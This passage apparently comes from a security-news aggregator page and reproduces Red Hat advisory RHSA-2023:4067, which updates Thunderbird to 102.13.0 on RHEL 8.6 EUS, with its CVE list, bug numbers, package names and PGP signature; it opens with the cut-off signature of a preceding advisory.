t96ninfUhzEJOhFOQ9QzmB4465imm/w4zTpKv7V5H9ZmqrChRRdglaY8XN+rS8mZ  
ArhskGnYBmGvXfEiTv4W57j4AkC24ljSOgQYKu7nI8jXrhTFKWC+OMzVS5mXIFQd  
heM2/tIeZQxWXQXFXRB8OoVgOd995oSb4on3CL2cu9rpb3Yg9IQqocmf665WtRwN  
aLTb4oDdcS0sKVUQDLKqFtwGNot2Oq8nBW/fbTi7Ogncs6n46T7OdwmRHtak9/gA  
HeW6ekBeYesnQbVaUKhJdSJQFXvAZ145fo8J089K8nLbdnQaycAOeatWCb+RRg7u  
AVkXGo/n7htQvXAQWzQ3IcdA6AyZDQvtcZAa7u2G7u7XFJqSTSDBZbs67+P3UGex  
LtyR2Zi75bytEtqKz3HOMlZiP1C+uY9MVcsuDx9zlfDo1S4YobacipA3VN8QSo0q  
3sG1tIa+GSXg+4/EJB+n  
=1a2O  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4075-01

Red Hat Security Advisory 2023-4067-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.13.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:4067-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4067  
Issue date:        2023-07-13  
CVE Names:         CVE-2023-37201 CVE-2023-37202 CVE-2023-37207   
                   CVE-2023-37208 CVE-2023-37211   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.13.0.

Security Fix(es):

* Mozilla: Use-after-free in WebRTC certificate generation (CVE-2023-37201)

* Mozilla: Potential use-after-free from compartment mismatch in  
SpiderMonkey (CVE-2023-37202)

* Mozilla: Memory safety bugs fixed in Firefox 115, Firefox ESR 102.13, and  
Thunderbird 102.13 (CVE-2023-37211)

* Mozilla: Fullscreen notification obscured (CVE-2023-37207)

* Mozilla: Lack of warning when opening Diagcab files (CVE-2023-37208)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2219747 - CVE-2023-37201 Mozilla: Use-after-free in WebRTC certificate generation  
2219748 - CVE-2023-37202 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey  
2219749 - CVE-2023-37207 Mozilla: Fullscreen notification obscured  
2219750 - CVE-2023-37208 Mozilla: Lack of warning when opening Diagcab files  
2219751 - CVE-2023-37211 Mozilla: Memory safety bugs fixed in Firefox 115, Firefox ESR 102.13, and Thunderbird 102.13

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
thunderbird-102.13.0-2.el8_6.src.rpm

aarch64:  
thunderbird-102.13.0-2.el8_6.aarch64.rpm  
thunderbird-debuginfo-102.13.0-2.el8_6.aarch64.rpm  
thunderbird-debugsource-102.13.0-2.el8_6.aarch64.rpm

ppc64le:  
thunderbird-102.13.0-2.el8_6.ppc64le.rpm  
thunderbird-debuginfo-102.13.0-2.el8_6.ppc64le.rpm  
thunderbird-debugsource-102.13.0-2.el8_6.ppc64le.rpm

s390x:  
thunderbird-102.13.0-2.el8_6.s390x.rpm  
thunderbird-debuginfo-102.13.0-2.el8_6.s390x.rpm  
thunderbird-debugsource-102.13.0-2.el8_6.s390x.rpm

x86_64:  
thunderbird-102.13.0-2.el8_6.x86_64.rpm  
thunderbird-debuginfo-102.13.0-2.el8_6.x86_64.rpm  
thunderbird-debugsource-102.13.0-2.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-37201  
https://access.redhat.com/security/cve/CVE-2023-37202  
https://access.redhat.com/security/cve/CVE-2023-37207  
https://access.redhat.com/security/cve/CVE-2023-37208  
https://access.redhat.com/security/cve/CVE-2023-37211  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkr/6EAAoJENzjgjWX9erEFB4P/ilAlODIkXUXOfteypiSSN6w  
39XzURofAYEyVw6oPB0q0wEcLSybH4tsOi5P53HN8+flUNdN4poM55ctjk7OycHb  
u1edAIcf7BrCLMjsT0dzArIP2j9WTniA15BSgC1tYGOEImQi6sBONUDox6e/td92  
M0G7mUdBj0PWwG8N5YYU1iDHo64PoNaumwjOdxBNoIb5smdRQzK50rZOqQqhBOBH  
a+CXL9TiaZlCoMyuHH0WRiQqFYpLhLZaSUZJBRfuvsCWeJhOsplkYMHwD3Cd57y8  
eQ4jJfDT5cvC3hTLxbsv7tJC1XG4hOr3+vyGmmRjFChgK22cBtUkFVwYYumgqNcL  
5UPCVxobPSvfaIlrzQLyZ9IWl26izChMR7wean4TO6LPtGMBTPgHbMr3ClEnHnch  
HD9kKRtGvXHkH+CocNWddFmGsS9IID0yXU2aWY+/NcDfkhD221Dg7X6pmGp7wUZC  
l6hPylGY0mBzl3mL9Bx7PIVvWryz+Fr4cq1j+aCcwToaBRnXcn/JsoexwUF5Xg2K  
RarMUncemPTfMg5l/nmLsakN1fpHkrUfSJZH1VvEyIJBm9Z/cHkHUHbtFTfu/jCx  
4A8pbvXrZ1cP6i3j7h/qSLc40bE0/d7mUh5OYzO3pg6RxAQF3zsYE+BVLyUUcrkL  
EOgL0EUUaoqqUyK0Tetc  
=t0XN  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#firefox